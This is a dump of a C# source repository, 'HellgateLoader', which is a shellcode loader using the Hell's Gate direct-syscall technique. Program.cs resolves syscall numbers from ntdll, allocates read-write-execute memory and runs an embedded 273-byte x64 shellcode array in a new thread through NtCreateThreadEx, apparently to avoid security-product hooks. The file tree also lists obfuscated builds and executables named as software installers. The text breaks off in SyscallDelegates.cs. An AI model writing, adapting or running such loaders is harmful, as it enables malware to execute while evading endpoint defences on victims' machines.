├── .vs └── HellgateLoader │ └── v16 │ └── .suo ├── HellgateLoader.sln ├── HellgateLoader ├── App.config ├── HellgateLoader.csproj ├── HellgateLoader.csproj.user ├── NativeStructs.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── SyscallRes │ ├── SyscallDelegates.cs │ ├── SyscallFunctions.cs │ └── SyscallTable.cs ├── Utils │ ├── MemoryUtil.cs │ └── ModuleUtil.cs ├── bin │ ├── Debug │ │ ├── HellgateLoader.exe │ │ ├── HellgateLoader.exe.config │ │ └── HellgateLoader.pdb │ ├── Release │ │ ├── HellgateLoader.exe │ │ ├── HellgateLoader.exe.config │ │ └── HellgateLoader.pdb │ ├── x64 │ │ ├── Debug │ │ │ ├── HellgateLoader.exe │ │ │ ├── HellgateLoader.exe.config │ │ │ └── HellgateLoader.pdb │ │ └── Release │ │ │ ├── HellgateLoader.exe │ │ │ ├── HellgateLoader.exe.config │ │ │ ├── HellgateLoader.pdb │ │ │ ├── ObfusHell.exe │ │ │ ├── ObfusHellgate.exe │ │ │ ├── SFLinker_installer.exe │ │ │ ├── SFLinker_installer.rar │ │ │ └── SFworks_installer.exe │ └── x86 │ │ ├── Debug │ │ ├── HellgateLoader.exe │ │ ├── HellgateLoader.exe.config │ │ └── HellgateLoader.pdb │ │ └── Release │ │ ├── HellgateLoader.exe │ │ ├── HellgateLoader.exe.config │ │ └── HellgateLoader.pdb └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ ├── HellgateLoader.csprojAssemblyReference.cache │ ├── HellgateLoader.exe │ └── HellgateLoader.pdb │ ├── Release │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ ├── HellgateLoader.csprojAssemblyReference.cache │ ├── HellgateLoader.exe │ └── HellgateLoader.pdb │ ├── x64 │ ├── Debug │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ │ ├── HellgateLoader.csprojAssemblyReference.cache │ │ ├── HellgateLoader.exe │ │ └── HellgateLoader.pdb │ └── Release │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ │ ├── HellgateLoader.exe │ │ └── HellgateLoader.pdb │ └── x86 │ ├── Debug │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ ├── HellgateLoader.csprojAssemblyReference.cache │ ├── HellgateLoader.exe │ └── HellgateLoader.pdb │ └── Release │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ ├── HellgateLoader.csproj.CoreCompileInputs.cache │ ├── HellgateLoader.csproj.FileListAbsolute.txt │ ├── HellgateLoader.csprojAssemblyReference.cache │ ├── HellgateLoader.exe │ └── HellgateLoader.pdb └── README.md /.vs/HellgateLoader/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/.vs/HellgateLoader/v16/.suo -------------------------------------------------------------------------------- /HellgateLoader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31129.286 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HellgateLoader", "HellgateLoader\HellgateLoader.csproj", "{209834AA-3CB2-4EBA-A100-A8A27BD7220F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|x64.ActiveCfg = Debug|x64 21 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|x64.Build.0 = Debug|x64 22 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|x86.ActiveCfg = Debug|x86 23 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Debug|x86.Build.0 = Debug|x86 24 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|x64.ActiveCfg = Release|x64 27 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|x64.Build.0 = Release|x64 28 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|x86.ActiveCfg = Release|x86 29 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {C8149A68-0AE5-407B-BE56-042871BCEA02} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /HellgateLoader/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /HellgateLoader/HellgateLoader.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {209834AA-3CB2-4EBA-A100-A8A27BD7220F} 8 | Exe 9 | HellgateLoader 10 | HellgateLoader 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | 33 | AnyCPU 34 | true 35 | full 36 | false 37 | bin\Debug\ 38 | DEBUG;TRACE 39 | prompt 40 | 4 41 | 42 | 43 | AnyCPU 44 | pdbonly 45 | true 46 | bin\Release\ 47 | TRACE 48 | prompt 49 | 4 50 | 51 | 52 | true 53 | bin\x64\Debug\ 54 | TRACE;DEBUG 55 | full 56 | x64 57 | 7.3 58 | prompt 59 | true 60 | true 61 | false 62 | 63 | 64 | bin\x64\Release\ 65 | 66 | 67 | true 68 | pdbonly 69 | x64 70 | 7.3 71 | prompt 72 | true 73 | true 74 | MinimumRecommendedRules.ruleset 75 | false 76 | false 77 | 78 | 79 | true 80 | bin\x86\Debug\ 81 | DEBUG;TRACE 82 | full 83 | x86 84 | 7.3 85 | prompt 86 | true 87 | 88 | 89 | bin\x86\Release\ 90 | TRACE 91 | true 92 | pdbonly 93 | x86 94 | 7.3 95 | prompt 96 | true 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | False 128 | Microsoft .NET Framework 4.7.2 %28x86 和 x64%29 129 | true 130 | 131 | 132 | False 133 | .NET Framework 3.5 SP1 134 | false 135 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /HellgateLoader/HellgateLoader.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | zh-CN 11 | false 12 | 13 | -------------------------------------------------------------------------------- /HellgateLoader/NativeStructs.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace HellgateLoader 5 | { 6 | class NativeStructs 7 | { 8 | [StructLayout(LayoutKind.Sequential)] 9 | public struct IMAGE_DOS_HEADER 10 | { 11 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)] 12 | public char[] e_magic; // Magic number 13 | public UInt16 e_cblp; // Bytes on last page of file 14 | public UInt16 e_cp; // Pages in file 15 | public UInt16 e_crlc; // Relocations 16 | public UInt16 e_cparhdr; // Size of header in paragraphs 17 | public UInt16 e_minalloc; // Minimum extra paragraphs needed 18 | public UInt16 e_maxalloc; // Maximum extra paragraphs needed 19 | public UInt16 e_ss; // Initial (relative) SS value 20 | public UInt16 e_sp; // Initial SP value 21 | public UInt16 e_csum; // Checksum 22 | public UInt16 e_ip; // Initial IP value 23 | public UInt16 e_cs; // Initial (relative) CS value 24 | public UInt16 e_lfarlc; // File address of relocation table 25 | public UInt16 e_ovno; // Overlay number 26 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 27 | public UInt16[] e_res1; // Reserved words 28 | public UInt16 e_oemid; // OEM identifier (for e_oeminfo) 29 | public UInt16 e_oeminfo; // OEM information; e_oemid specific 30 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] 31 | public UInt16[] e_res2; // Reserved words 32 | public Int32 e_lfanew; // File address of new exe header 33 | } 34 | 35 | [StructLayout(LayoutKind.Explicit, Size = 22)] 36 | public struct IMAGE_NT_HEADER64 37 | { 38 | [FieldOffset(0)] 39 | public UInt32 Signature; 40 | [FieldOffset(4)] 41 | public IMAGE_FILE_HEADER FileHeader; 42 | [FieldOffset(24)] 43 | public IMAGE_OPTIONAL_HEADER64 OptionalHeader; 44 | } 45 | 46 | 47 | [StructLayout(LayoutKind.Explicit)] 48 | public struct IMAGE_OPTIONAL_HEADER64 49 | { 50 | [FieldOffset(112)] 51 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] 52 | public IMAGE_DATA_DIRECTORY[] DataDirectory; 53 | } 54 | 55 | [StructLayout(LayoutKind.Sequential)] 56 | public struct IMAGE_DATA_DIRECTORY 57 | { 58 | public UInt32 VirtualAddress; 59 | public UInt32 Size; 60 | } 61 | 62 | [StructLayout(LayoutKind.Sequential)] 63 | public struct IMAGE_EXPORT_DIRECTORY 64 | { 65 | public UInt32 Characteristics; 66 | public UInt32 TimeDateStamp; 67 | public UInt16 MajorVersion; 68 | public UInt16 MinorVersion; 69 | public UInt32 Name; 70 | public UInt32 Base; 71 | public UInt32 NumberOfFunctions; 72 | public UInt32 NumberOfNames; 73 | public UInt32 AddressOfFunctions; // RVA from base of image 74 | public UInt32 AddressOfNames; // RVA from base of image 75 | public UInt32 AddressOfNameOrdinals; // RVA from base of image 76 | } 77 | 78 | [StructLayout(LayoutKind.Explicit)] 79 | public struct IMAGE_SECTION_HEADER 80 | { 81 | [FieldOffset(0)] 82 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] 83 | public char[] Name; 84 | 85 | [FieldOffset(8)] 86 | public UInt32 VirtualSize; 87 | 88 | [FieldOffset(12)] 89 | public UInt32 VirtualAddress; 90 | 91 | [FieldOffset(16)] 92 | public UInt32 SizeOfRawData; 93 | 94 | [FieldOffset(20)] 95 | public UInt32 PointerToRawData; 96 | 97 | [FieldOffset(24)] 98 | public UInt32 PointerToRelocations; 99 | 100 | [FieldOffset(28)] 101 | public UInt32 PointerToLinenumbers; 102 | 103 | [FieldOffset(32)] 104 | public UInt16 NumberOfRelocations; 105 | 106 | [FieldOffset(34)] 107 | public UInt16 NumberOfLinenumbers; 108 | 109 | [FieldOffset(36)] 110 | public DataSectionFlags Characteristics; 111 | 112 | public string SectionName 113 | { 114 | get { return new string(Name); } 115 | } 116 | } 117 | 118 | [StructLayout(LayoutKind.Sequential)] 119 | public struct IMAGE_FILE_HEADER 120 | { 121 | public UInt16 Machine; // 4 + 12 + 4 20 122 | public UInt16 NumberOfSections; 123 | public UInt32 TimeDateStamp; 124 | public UInt32 PointerToSymbolTable; 125 | public UInt32 NumberOfSymbols; 126 | public UInt16 SizeOfOptionalHeader; 127 | public UInt16 Characteristics; 128 | } 129 | 130 | public enum DataSectionFlags : uint 131 | { 132 | /// 133 | /// Reserved for future use. 134 | /// 135 | TypeReg = 0x00000000, 136 | /// 137 | /// Reserved for future use. 138 | /// 139 | TypeDsect = 0x00000001, 140 | /// 141 | /// Reserved for future use. 142 | /// 143 | TypeNoLoad = 0x00000002, 144 | /// 145 | /// Reserved for future use. 146 | /// 147 | TypeGroup = 0x00000004, 148 | /// 149 | /// The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES. This is valid only for object files. 150 | /// 151 | TypeNoPadded = 0x00000008, 152 | /// 153 | /// Reserved for future use. 154 | /// 155 | TypeCopy = 0x00000010, 156 | /// 157 | /// The section contains executable code. 158 | /// 159 | ContentCode = 0x00000020, 160 | /// 161 | /// The section contains initialized data. 162 | /// 163 | ContentInitializedData = 0x00000040, 164 | /// 165 | /// The section contains uninitialized data. 166 | /// 167 | ContentUninitializedData = 0x00000080, 168 | /// 169 | /// Reserved for future use. 170 | /// 171 | LinkOther = 0x00000100, 172 | /// 173 | /// The section contains comments or other information. The .drectve section has this type. This is valid for object files only. 174 | /// 175 | LinkInfo = 0x00000200, 176 | /// 177 | /// Reserved for future use. 178 | /// 179 | TypeOver = 0x00000400, 180 | /// 181 | /// The section will not become part of the image. This is valid only for object files. 182 | /// 183 | LinkRemove = 0x00000800, 184 | /// 185 | /// The section contains COMDAT data. For more information, see section 5.5.6, COMDAT Sections (Object Only). This is valid only for object files. 186 | /// 187 | LinkComDat = 0x00001000, 188 | /// 189 | /// Reset speculative exceptions handling bits in the TLB entries for this section. 190 | /// 191 | NoDeferSpecExceptions = 0x00004000, 192 | /// 193 | /// The section contains data referenced through the global pointer (GP). 194 | /// 195 | RelativeGP = 0x00008000, 196 | /// 197 | /// Reserved for future use. 198 | /// 199 | MemPurgeable = 0x00020000, 200 | /// 201 | /// Reserved for future use. 202 | /// 203 | Memory16Bit = 0x00020000, 204 | /// 205 | /// Reserved for future use. 206 | /// 207 | MemoryLocked = 0x00040000, 208 | /// 209 | /// Reserved for future use. 210 | /// 211 | MemoryPreload = 0x00080000, 212 | /// 213 | /// Align data on a 1-byte boundary. Valid only for object files. 214 | /// 215 | Align1Bytes = 0x00100000, 216 | /// 217 | /// Align data on a 2-byte boundary. Valid only for object files. 218 | /// 219 | Align2Bytes = 0x00200000, 220 | /// 221 | /// Align data on a 4-byte boundary. Valid only for object files. 222 | /// 223 | Align4Bytes = 0x00300000, 224 | /// 225 | /// Align data on an 8-byte boundary. Valid only for object files. 226 | /// 227 | Align8Bytes = 0x00400000, 228 | /// 229 | /// Align data on a 16-byte boundary. Valid only for object files. 230 | /// 231 | Align16Bytes = 0x00500000, 232 | /// 233 | /// Align data on a 32-byte boundary. Valid only for object files. 234 | /// 235 | Align32Bytes = 0x00600000, 236 | /// 237 | /// Align data on a 64-byte boundary. Valid only for object files. 238 | /// 239 | Align64Bytes = 0x00700000, 240 | /// 241 | /// Align data on a 128-byte boundary. Valid only for object files. 242 | /// 243 | Align128Bytes = 0x00800000, 244 | /// 245 | /// Align data on a 256-byte boundary. Valid only for object files. 246 | /// 247 | Align256Bytes = 0x00900000, 248 | /// 249 | /// Align data on a 512-byte boundary. Valid only for object files. 250 | /// 251 | Align512Bytes = 0x00A00000, 252 | /// 253 | /// Align data on a 1024-byte boundary. Valid only for object files. 254 | /// 255 | Align1024Bytes = 0x00B00000, 256 | /// 257 | /// Align data on a 2048-byte boundary. Valid only for object files. 258 | /// 259 | Align2048Bytes = 0x00C00000, 260 | /// 261 | /// Align data on a 4096-byte boundary. Valid only for object files. 262 | /// 263 | Align4096Bytes = 0x00D00000, 264 | /// 265 | /// Align data on an 8192-byte boundary. Valid only for object files. 266 | /// 267 | Align8192Bytes = 0x00E00000, 268 | /// 269 | /// The section contains extended relocations. 270 | /// 271 | LinkExtendedRelocationOverflow = 0x01000000, 272 | /// 273 | /// The section can be discarded as needed. 274 | /// 275 | MemoryDiscardable = 0x02000000, 276 | /// 277 | /// The section cannot be cached. 278 | /// 279 | MemoryNotCached = 0x04000000, 280 | /// 281 | /// The section is not pageable. 282 | /// 283 | MemoryNotPaged = 0x08000000, 284 | /// 285 | /// The section can be shared in memory. 286 | /// 287 | MemoryShared = 0x10000000, 288 | /// 289 | /// The section can be executed as code. 290 | /// 291 | MemoryExecute = 0x20000000, 292 | /// 293 | /// The section can be read. 294 | /// 295 | MemoryRead = 0x40000000, 296 | /// 297 | /// The section can be written to. 298 | /// 299 | MemoryWrite = 0x80000000 300 | } 301 | 302 | 303 | [Flags] 304 | public enum EFileAccess : uint 305 | { 306 | // 307 | // Standart Section 308 | // 309 | 310 | AccessSystemSecurity = 0x1000000, // AccessSystemAcl access type 311 | MaximumAllowed = 0x2000000, // MaximumAllowed access type 312 | 313 | Delete = 0x10000, 314 | ReadControl = 0x20000, 315 | WriteDAC = 0x40000, 316 | WriteOwner = 0x80000, 317 | Synchronize = 0x100000, 318 | 319 | StandardRightsRequired = 0xF0000, 320 | StandardRightsRead = ReadControl, 321 | StandardRightsWrite = ReadControl, 322 | StandardRightsExecute = ReadControl, 323 | StandardRightsAll = 0x1F0000, 324 | SpecificRightsAll = 0xFFFF, 325 | 326 | FILE_READ_DATA = 0x0001, // file & pipe 327 | FILE_LIST_DIRECTORY = 0x0001, // directory 328 | FILE_WRITE_DATA = 0x0002, // file & pipe 329 | FILE_ADD_FILE = 0x0002, // directory 330 | FILE_APPEND_DATA = 0x0004, // file 331 | FILE_ADD_SUBDIRECTORY = 0x0004, // directory 332 | FILE_CREATE_PIPE_INSTANCE = 0x0004, // named pipe 333 | FILE_READ_EA = 0x0008, // file & directory 334 | FILE_WRITE_EA = 0x0010, // file & directory 335 | FILE_EXECUTE = 0x0020, // file 336 | FILE_TRAVERSE = 0x0020, // directory 337 | FILE_DELETE_CHILD = 0x0040, // directory 338 | FILE_READ_ATTRIBUTES = 0x0080, // all 339 | FILE_WRITE_ATTRIBUTES = 0x0100, // all 340 | 341 | // 342 | // Generic Section 343 | // 344 | 345 | GenericRead = 0x80000000, 346 | GenericWrite = 0x40000000, 347 | GenericExecute = 0x20000000, 348 | GenericAll = 0x10000000, 349 | 350 | SPECIFIC_RIGHTS_ALL = 0x00FFFF, 351 | FILE_ALL_ACCESS = 352 | StandardRightsRequired | 353 | Synchronize | 354 | 0x1FF, 355 | 356 | FILE_GENERIC_READ = 357 | StandardRightsRead | 358 | FILE_READ_DATA | 359 | FILE_READ_ATTRIBUTES | 360 | FILE_READ_EA | 361 | Synchronize, 362 | 363 | FILE_GENERIC_WRITE = 364 | StandardRightsWrite | 365 | FILE_WRITE_DATA | 366 | FILE_WRITE_ATTRIBUTES | 367 | FILE_WRITE_EA | 368 | FILE_APPEND_DATA | 369 | Synchronize, 370 | 371 | FILE_GENERIC_EXECUTE = 372 | StandardRightsExecute | 373 | FILE_READ_ATTRIBUTES | 374 | FILE_EXECUTE | 375 | Synchronize 376 | } 377 | 378 | [Flags] 379 | public enum EFileShare : uint 380 | { 381 | /// 382 | /// 383 | /// 384 | None = 0x00000000, 385 | /// 386 | /// Enables subsequent open operations on an object to request read access. 387 | /// Otherwise, other processes cannot open the object if they request read access. 388 | /// If this flag is not specified, but the object has been opened for read access, the function fails. 389 | /// 390 | Read = 0x00000001, 391 | /// 392 | /// Enables subsequent open operations on an object to request write access. 393 | /// Otherwise, other processes cannot open the object if they request write access. 394 | /// If this flag is not specified, but the object has been opened for write access, the function fails. 395 | /// 396 | Write = 0x00000002, 397 | /// 398 | /// Enables subsequent open operations on an object to request delete access. 399 | /// Otherwise, other processes cannot open the object if they request delete access. 400 | /// If this flag is not specified, but the object has been opened for delete access, the function fails. 401 | /// 402 | Delete = 0x00000004 403 | } 404 | 405 | public enum EFileMode : uint 406 | { 407 | /// 408 | /// Creates a new file. The function fails if a specified file exists. 409 | /// 410 | New = 1, 411 | /// 412 | /// Creates a new file, always. 413 | /// If a file exists, the function overwrites the file, clears the existing attributes, combines the specified file attributes, 414 | /// and flags with FILE_ATTRIBUTE_ARCHIVE, but does not set the security descriptor that the SECURITY_ATTRIBUTES structure specifies. 415 | /// 416 | CreateAlways = 2, 417 | /// 418 | /// Opens a file. The function fails if the file does not exist. 419 | /// 420 | OpenExisting = 3, 421 | /// 422 | /// Opens a file, always. 423 | /// If a file does not exist, the function creates a file as if dwCreationDisposition is CREATE_NEW. 424 | /// 425 | OpenAlways = 4, 426 | /// 427 | /// Opens a file and truncates it so that its size is 0 (zero) bytes. The function fails if the file does not exist. 428 | /// The calling process must open the file with the GENERIC_WRITE access right. 429 | /// 430 | TruncateExisting = 5 431 | } 432 | 433 | [Flags] 434 | public enum EFileAttributes : uint 435 | { 436 | Readonly = 0x00000001, 437 | Hidden = 0x00000002, 438 | System = 0x00000004, 439 | Directory = 0x00000010, 440 | Archive = 0x00000020, 441 | Device = 0x00000040, 442 | Normal = 0x00000080, 443 | Temporary = 0x00000100, 444 | SparseFile = 0x00000200, 445 | ReparsePoint = 0x00000400, 446 | Compressed = 0x00000800, 447 | Offline = 0x00001000, 448 | NotContentIndexed = 0x00002000, 449 | Encrypted = 0x00004000, 450 | Write_Through = 0x80000000, 451 | Overlapped = 0x40000000, 452 | NoBuffering = 0x20000000, 453 | RandomAccess = 0x10000000, 454 | SequentialScan = 0x08000000, 455 | DeleteOnClose = 0x04000000, 456 | BackupSemantics = 0x02000000, 457 | PosixSemantics = 0x01000000, 458 | OpenReparsePoint = 0x00200000, 459 | OpenNoRecall = 0x00100000, 460 | FirstPipeInstance = 0x00080000 461 | } 462 | 463 | public enum FileMapProtection : uint 464 | { 465 | PageReadonly = 0x02, 466 | PageReadWrite = 0x04, 467 | PageWriteCopy = 0x08, 468 | PageExecuteRead = 0x20, 469 | PageExecuteReadWrite = 0x40, 470 | SectionCommit = 0x8000000, 471 | SectionImage = 0x1000000, 472 | SectionNoCache = 0x10000000, 473 | SectionReserve = 0x4000000, 474 | } 475 | 476 | public enum FileMapAccessType : uint 477 | { 478 | Copy = 0x01, 479 | Write = 0x02, 480 | Read = 0x04, 481 | AllAccess = 0x08, 482 | Execute = 0x20, 483 | } 484 | } 485 | 486 | } 487 | 488 | -------------------------------------------------------------------------------- /HellgateLoader/Program.cs: -------------------------------------------------------------------------------- 1 | using HellgateLoader.SyscallRes; 2 | using HellgateLoader.Utils; 3 | using System; 4 | using System.Linq; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace HellgateLoader 9 | { 10 | class Program 11 | { 12 | public static void InvokeHellGate() 13 | { 14 | string filename_path = @"C:\Windows\System32\ntdll.dll"; 15 | 16 | SyscallFunctions Syscall_funcitons = new SyscallFunctions(); 17 | bool Generate_status = Syscall_funcitons.GenerateRWXMemorySegment(); 18 | 19 | if (Generate_status == false) 20 | { 21 | Console.WriteLine("Cannot generate RWX memory!"); 22 | System.Threading.Thread.Sleep(10000); 23 | return; 24 | } 25 | 26 | ModuleUtil.SetSyscallTable(filename_path); 27 | 28 | for (int count = 0; count < SyscallTable.Syscall_list.Count(); count++) 29 | { 30 | for (int index = 0; index < SyscallTable.Syscall_list[count].syscall_byte.Length; index++) 31 | { 32 | Console.Write(SyscallTable.Syscall_list[count].syscall_byte[index]); 33 | } 34 | Console.Write("\n"); 35 | } 36 | 37 | byte[] buf1 = new byte[273] { 38 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 39 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 40 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 41 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 42 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 43 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 44 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 45 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 46 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 47 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 48 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 49 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 50 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 51 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 52 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 53 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 54 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 55 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 56 | 0x63,0x00,0xc3 57 | }; 58 | 59 | // Allocate Memory 60 | IntPtr pBaseAddres = IntPtr.Zero; 61 | IntPtr Region = (IntPtr)buf1.Length; 62 | 63 | IntPtr getcurrent = new IntPtr(-1); 64 | UInt32 ntstatus = Syscall_funcitons.NtAllocateVirtualMemory( 65 | getcurrent, 66 | ref pBaseAddres, 67 | IntPtr.Zero, 68 | ref Region, 69 | 0x2000 | 0x1000, 70 | 0x40); 71 | 72 | Marshal.Copy(buf1, 0, pBaseAddres, buf1.Length); 73 | 74 | IntPtr hThread = IntPtr.Zero; 75 | ntstatus = Syscall_funcitons.NtCreateThreadEx( 76 | out hThread, 77 | 0x1FFFFF, 78 | IntPtr.Zero, 79 | getcurrent, 80 | pBaseAddres, 81 | IntPtr.Zero, 82 | false, 83 | 0, 84 | 0, 85 | 0, 86 | IntPtr.Zero); 87 | 88 | ntstatus = Syscall_funcitons.NtWaitForSingleObject(hThread, true, 0); 89 | return; 90 | } 91 | 92 | static void Main(string[] args) 93 | { 94 | InvokeHellGate(); 95 | 96 | } 97 | } 98 | } 99 | -------------------------------------------------------------------------------- /HellgateLoader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.InteropServices; 3 | 4 | // 有关程序集的一般信息由以下 5 | // 控制。更改这些特性值可修改 6 | // 与程序集关联的信息。 7 | [assembly: AssemblyTitle("HellgateLoader")] 8 | [assembly: AssemblyDescription("")] 9 | [assembly: AssemblyConfiguration("")] 10 | [assembly: AssemblyCompany("")] 11 | [assembly: AssemblyProduct("HellgateLoader")] 12 | [assembly: AssemblyCopyright("Copyright © 2021")] 13 | [assembly: AssemblyTrademark("")] 14 | [assembly: AssemblyCulture("")] 15 | 16 | // 将 ComVisible 设置为 false 会使此程序集中的类型 17 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 18 | //请将此类型的 ComVisible 特性设置为 true。 19 | [assembly: ComVisible(false)] 20 | 21 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 22 | [assembly: Guid("209834aa-3cb2-4eba-a100-a8a27bd7220f")] 23 | 24 | // 程序集的版本信息由下列四个值组成: 25 | // 26 | // 主版本 27 | // 次版本 28 | // 生成号 29 | // 修订号 30 | // 31 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 32 | //通过使用 "*",如下所示: 33 | // [assembly: AssemblyVersion("1.0.*")] 34 | [assembly: AssemblyVersion("1.0.0.0")] 35 | [assembly: AssemblyFileVersion("1.0.0.0")] 36 | -------------------------------------------------------------------------------- /HellgateLoader/SyscallRes/SyscallDelegates.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace HellgateLoader.SyscallRes 5 | { 6 | class SyscallDelegates 7 | { 8 | 